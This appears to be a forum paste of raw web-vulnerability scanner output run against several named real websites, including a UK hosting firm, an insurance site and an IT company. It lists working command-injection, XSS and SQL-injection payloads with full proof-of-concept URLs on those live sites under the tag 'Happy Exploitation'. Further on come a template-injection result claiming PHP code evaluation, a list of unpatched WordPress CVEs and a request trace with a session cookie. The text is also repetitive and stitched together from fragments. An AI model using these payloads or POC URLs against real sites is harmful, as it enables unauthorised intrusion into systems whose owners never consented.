Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting</a>[*] POC: https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
[!] Code Snippet: <li><a href="/hosting/linux-hosting-packages.php">UK Web Hosting Packages</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
[!] Code Snippet: <li><a href="/hosting/linux-hosting-features.php">UK Web Hosting Features</a></li><li><a href="/hosting/1-click-install-hosting.php">View 1 Click Installs</a> <ul> <li><a href="/hosting/uk-wordpress-hosting.php">UK WordPress Hosting</a></li><li><a href="/hosting/uk-CMSMS-hosting.php">UK CMSMS Hosting</a></li><li><a href="/hosting/prestashop-hosting-uk.php">PrestaShop Hosting</a></li><li><a href="/hosting/uk-drupal-hosting.php">Drupal Hosting</a></li><li><a href="/hosting/zencart-hosting-uk.php">ZenCart Hosting</a></li><li><a href="/hosting/moodle-hosting-uk.php">Moodle Hosting</a></li><li><a href="/hosting/uk-concrete5-hosting.php">Concrete5 Hosting</a></li><li><a href="/hosting/uk-joomla-hosting.php">Joomla Hosting</a></li><li><a href="/hosting/uk-opencart-hosting.php">OpenCart Hosting</a></li></ul> </li><li><a href="/hosting/move-hosting.php">Website Migration</a></li><li><a href="/hosting/control-panel-demo.php">Control Panel Demo</a></li>[*] POC: https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: ;phpinfo
[!] Code Snippet: <div id="footer"> <div id="ninesixzero"> <div id="footerblockleftone"> <h6 class="footerheadersix">Domains & UK Hosting</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/domain-names/domain-name-registration.php">Domain Names</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/linux-hosting-packages.php">Web Hosting</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/virtual-private-servers/order-vps.php">Virtual Servers</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact us</a></li></ul> </div><div id="footerblocklefttwo"> <h6 class="footerheadersix">Resources</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting/1-click-install-hosting.php">Free Scripts & 1 Click Installs</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/hosting-blog/hosting-blog.php" >Hosting Blog</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms and Conditions</a></li><li class="footerli"><a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a></li></ul> </div><div id="footerblockleftthree"><h6 class="footerheadersix">Social</h6> <ul class="footerul"> <li class="footerli"><a href="https://www.facebook.com/SquirrelHosting">Facebook</a></li><li class="footerli"><a href="https://twitter.com/squirrelhosting">Twitter</a></li><li class="footerli"><a href="https://plus.google.com/111473460656603282963">Find us on Google+</a></li></ul></div><div id="footerblocklast"> <h6 class="footerheadersix">Additional Information</h6> <ul class="footerul"> <li class="footerlinobullet"> <span class="cards"><img id="creditcardsfooter" src="/img_trans.png" height="1" width="1" alt="Payment Cards Accepted"/></span></a></li><li class="footerlinobullet"> <table class="veritable" cellspacing=0 cellpadding=0 title="CLICK TO VERIFY: This site uses a GlobalSign SSL Certificate to secure your personal information." > <tr> <td align="center"><span id="ss_img_wrapper_gmogs_image_125-50_en_white"><a href="https://www.globalsign.co.uk/" target=_blank title="GlobalSign Site Seal" rel="nofollow"><img alt="SSL" border=0 id="ss_img" src="//seal.globalsign.com/SiteSeal/images/gmogs_image_125-50_en_white.png"></a></span><script defer type="text/javascript" src="//seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_white.js"></script></td></tr></table> </li></ul> </div></div></div><div id="bottomfooter"> <div id="ninesixzero"> <div id="footerbottomleft">© Copyright 2014 | Squirrel Hosting Limited<br/> Company Number 9031308</div><div id="footerbottomright"> <a href="https://www.squirrelhosting.co.uk/contact-squirrel/index.php">Contact</a> | <a href="https://www.squirrelhosting.co.uk/other/privacy-policy.php">Privacy Policy</a> | <a href="https://www.squirrelhosting.co.uk/other/terms.php">Terms & Conditions</a></div><div id="footerbottomcenter"></div></div></div>[*] POC: https://www.squirrelhosting.co.uk/ho...?id=94;phpinfo[*] Happy Exploitation

[!] Congratulations you've found 48 bugs :-)
[!] Enter the URL: http://www.jfuinsurance.com/insurance/index.php?id=1137
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host: http://www.jfuinsurance.com
[!] WebServer: Apache
[!] x-powered-by
[!] PHP/5.3.29
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for XSS
[!] Please wait ....[*] Payload Found . . .[*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0% 2F%29%3Eweb
[!] Code Snippet: Message: SQL: SELECT a.*, b.topic_name AS category_name, c.group_id FROM engine2_articles a LEFT JOIN engine2_article_views b ON a.category_id=b.category_id AND b.view_id = 1000 LEFT JOIN engine2_article_categories c ON a.category_id=c.category_id WHERE a.article_id=1137\'>zigoo0<svg/onload=confirm(/zigoo0/)>web[*] POC: http://www.jfuinsurance.com/insuranc...o0%2F%29%3Eweb[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0% 2F%29%3Eweb
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'>zigoo0<svg/onload=confirm(/zigoo0/)>web' at line 1[*] POC: http://www.jfuinsurance.com/insuranc...o0%2F%29%3Eweb[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: Message: SQL: SELECT a.*, b.topic_name AS category_name, c.group_id FROM engine2_articles a LEFT JOIN engine2_article_views b ON a.category_id=b.category_id AND b.view_id = 1000 LEFT JOIN engine2_article_categories c ON a.category_id=c.category_id WHERE a.article_id=1137x\"x>x[*] POC: http://www.jfuinsurance.com/insuranc...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %78%22%78%3e%78
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"x>x' at line 1[*] POC: http://www.jfuinsurance.com/insuranc...78%22%78%3e%78[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0% 2F%29%3Eweb
[!] Code Snippet: Message: SQL: SELECT a.*, b.topic_name AS category_name, c.group_id FROM engine2_articles a LEFT JOIN engine2_article_views b ON a.category_id=b.category_id AND b.view_id = 1000 LEFT JOIN engine2_article_categories c ON a.category_id=c.category_id WHERE a.article_id=1137\">zigoo0<svg/onload=confirm(/zigoo0/)>web[*] POC: http://www.jfuinsurance.com/insuranc...o0%2F%29%3Eweb[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0% 2F%29%3Eweb
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\">zigoo0<svg/onload=confirm(/zigoo0/)>web' at line 1[*] POC: http://www.jfuinsurance.com/insuranc...o0%2F%29%3Eweb[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29% 3Eweb
[!] Code Snippet: Message: SQL: SELECT a.*, b.topic_name AS category_name, c.group_id FROM engine2_articles a LEFT JOIN engine2_article_views b ON a.category_id=b.category_id AND b.view_id = 1000 LEFT JOIN engine2_article_categories c ON a.category_id=c.category_id WHERE a.article_id=1137zigoo0<svg/onload=confirm(/zigoo0/)>web[*] POC: http://www.jfuinsurance.com/insuranc...o0%2F%29%3Eweb[*] Happy Exploitation

[!] Congratulations you've found 7 bugs :-)
[!] Now Scanning for Error Based SQL Injection
[!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
[!] Please wait ....[*] Payload Found . . .[*] Payload: 3'
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1[*] POC: http://www.jfuinsurance.com/insuranc...x.php?id=11373'[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\' at line 1[*] POC: http://www.jfuinsurance.com/insuranc...hp?id=11373%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"()' at line 1[*] POC: http://www.jfuinsurance.com/insuranc...73%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3'><
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'><' at line 1[*] POC: http://www.jfuinsurance.com/insurance/index.php?id=11373'><[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%25 00%3E%25bf%2527%27
[!] Code Snippet: Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"\\\'\\\");|]*{%0d%0a<%00>%bf%27\'' at line 1[*] POC: http://www.jfuinsurance.com/insuranc...E%25bf%2527%27[*] Happy Exploitation

[!] Congratulations you've found 5 bugs :-)
[!] Enter the URL: http://www.eulinx.com/shop/ShowCateg...p?CategoryID=1
[!] Fingerprinting the backend Technologies.
[!] Status code: 200 OK
[!] Host: http://www.eulinx.com
[!] WebServer: Apache
[!] x-powered-by
[!] PleskLin
[!] Now Scanning for Remote Code/Command Execution
[!] Covering Linux & Windows Operating Systems
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for XSS
[!] Please wait ....
[!] Target is not vulnerable!
[!] Now Scanning for Error Based SQL Injection
[!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
[!] Please wait ....[*] Payload Found . . .[*] Payload: 3'
[!] Code Snippet: <META NAME="KEYWORDS" CONTENT=" Stoke, Hanley, Leek, Liverpool, Louisianna, Atlanta, Florida, United Kingdom, UK, USA, European , International, European, Engineering, Computer, I.T., Support, management, recruitment, estate agent, multi media, community, group, aid, charity, EULINX ~ IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support memorial day myspace facebook email database sql microsoft , liniux, data recovery, IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support, Business Consultancy and System Integration Business Continuity Consultants.">[*] POC: http://www.eulinx.com/shop/ShowCateg...?CategoryID=13'[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3'
[!] Code Snippet: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''13''[*] POC: http://www.eulinx.com/shop/ShowCateg...?CategoryID=13'[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: <META NAME="KEYWORDS" CONTENT=" Stoke, Hanley, Leek, Liverpool, Louisianna, Atlanta, Florida, United Kingdom, UK, USA, European , International, European, Engineering, Computer, I.T., Support, management, recruitment, estate agent, multi media, community, group, aid, charity, EULINX ~ IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support memorial day myspace facebook email database sql microsoft , liniux, data recovery, IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support, Business Consultancy and System Integration Business Continuity Consultants.">[*] POC: http://www.eulinx.com/shop/ShowCateg...tegoryID=13%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%5c
[!] Code Snippet: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''13\'[*] POC: http://www.eulinx.com/shop/ShowCateg...tegoryID=13%5c[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: <META NAME="KEYWORDS" CONTENT=" Stoke, Hanley, Leek, Liverpool, Louisianna, Atlanta, Florida, United Kingdom, UK, USA, European , International, European, Engineering, Computer, I.T., Support, management, recruitment, estate agent, multi media, community, group, aid, charity, EULINX ~ IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support memorial day myspace facebook email database sql microsoft , liniux, data recovery, IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support, Business Consultancy and System Integration Business Continuity Consultants.">[*] POC: http://www.eulinx.com/shop/ShowCateg...13%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%27%22%28%29
[!] Code Snippet: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"()'[*] POC: http://www.eulinx.com/shop/ShowCateg...13%27%22%28%29[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%25 00%3E%25bf%2527%27
[!] Code Snippet: <META NAME="KEYWORDS" CONTENT=" Stoke, Hanley, Leek, Liverpool, Louisianna, Atlanta, Florida, United Kingdom, UK, USA, European , International, European, Engineering, Computer, I.T., Support, management, recruitment, estate agent, multi media, community, group, aid, charity, EULINX ~ IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support memorial day myspace facebook email database sql microsoft , liniux, data recovery, IT Contingency Support, Analysis, Maintenance, Hosting, Software & Server Support, Business Consultancy and System Integration Business Continuity Consultants.">[*] POC: http://www.eulinx.com/shop/ShowCateg...E%25bf%2527%27[*] Happy Exploitation

[*] Payload Found . . .[*] Payload: 3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%25 00%3E%25bf%2527%27
[!] Code Snippet: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''13"\'\");|]*{%0d%0a<%00>%bf%27''[*] POC: http://www.eulinx.com/shop/ShowCateg...E%25bf%2527%27[*] Happy Exploitation

[!] Congratulations you've found 8 bugs :-)
GET parameter: CategoryID
Engine: Smarty
Injection: 1}*{
Context: code
OS: undetected
Technique: blind
Capabilities:
Code evaluation: yes, php code (blind)
Shell command execution: no
File write: no
File read: no
Bind and reverse shell: no
[+] WordPress version 4.5.2 identified from advanced fingerprinting (Released on 2016-05-06)
[!] 8 vulnerabilities identified from the version number
[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference: https://wpvulndb.com/vulnerabilities/8518
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPre...7281de83e32648
Reference: https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5833
Reference: https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5834
[i] Fixed in: 4.5.3
[+] WordPress version 4.5.2 identified from advanced fingerprinting (Released on 2016-05-06)
[!] 8 vulnerabilities identified from the version number
[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference: https://wpvulndb.com/vulnerabilities/8518
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPre...7281de83e32648
Reference: https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5833
Reference: https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5834
[i] Fixed in: 4.5.3
[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8519
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPre...7806953d1a25a1
Reference: https://www.wordfence.com/blog/2016/...otected-posts/
Reference: https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5835
[i] Fixed in: 4.5.3
[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
Reference: https://wpvulndb.com/vulnerabilities/8520
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPre...ca5e7fab6f307c
Reference: https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5837
[i] Fixed in: 4.5.3
[!] Title: WordPress 4.5.2 - Redirect Bypass
Reference: https://wpvulndb.com/vulnerabilities/8522
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5832
[i] Fixed in: 4.5.3
[!] Title: WordPress 4.5.2 - oEmbed Denial of Service (DoS)
Reference: https://wpvulndb.com/vulnerabilities/8523
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5836
[i] Fixed in: 4.5.3
[!] Title: WordPress 4.5.2 - Password Change via Stolen Cookie
Reference: https://wpvulndb.com/vulnerabilities/8524
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-5838
[i] Fixed in: 4.5.3
[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
Reference: https://wpvulndb.com/vulnerabilities/8615
Reference: https://wordpress.org/news/2016/09/w...nance-release/
Reference: https://github.com/WordPress/WordPre...ea891e4726d6e0
Reference: https://sumofpwn.nl/advisory/2016/pe...ile_names.html
Reference: http://seclists.org/fulldisclosure/2016/Sep/6
Reference: https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-7168
[i] Fixed in: 4.5.4
[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
Reference: https://wpvulndb.com/vulnerabilities/8616
Reference: https://wordpress.org/news/2016/09/w...nance-release/
Reference: https://github.com/WordPress/WordPre...d3ea790caa0b6e
Reference: https://cve.mitre.org/cgi-bin/cvenam...=CVE-2016-7169
[i] Fixed in: 4.5.4
Hostname eulinx.com was found in DNS cache
Trying 217.149.108.240...
Connected to eulinx.com (217.149.108.240) port 80 (#8)
GET /wp-content/themes/ifeaturepro5/style.css HTTP/1.1
Host: eulinx.com
Accept: */*
Referer: http://eulinx.com/
Cookie: PHPSESSID=2ur41e2tkgbdsqvg5cho7aht42; wordpress_test_cookie=WP+Cookie+check